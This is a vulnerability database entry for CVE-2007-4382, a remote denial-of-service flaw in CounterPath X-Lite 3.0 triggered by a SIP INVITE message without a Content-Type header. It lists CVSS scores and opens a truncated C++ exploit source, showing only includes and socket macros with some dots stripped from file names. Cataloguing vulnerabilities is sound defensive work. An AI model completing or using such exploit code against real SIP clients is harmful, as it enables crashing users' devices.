5
CVSSv2

CVE-2007-4382

Published: 17/08/2007 Updated: 15/10/2018
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

Vulnerability Summary

CounterPath X-Lite 3.0 34025, and possibly eyeBeam, allows remote malicious users to cause a denial of service (device crash) via a SIP INVITE message without a Content-Type header.

Vulnerable Product Search on Vulmon Subscribe to Product

counterpath x-lite 3.0

Exploits

/**********maincpp***********/ #include <stdioh> #include <string> using namespace std; #ifdef WIN32 #include <winsock2h> #pragma comment(lib, "ws2_32lib") #define close closesocket #define write(a,b,c) send(a, b, c, 0) #define writeto(a,b,c,d,e) sendto(a, b, c, 0, d, e) #define read(a,b,c) recv(a, b, c, 0) #define readfrom(a ...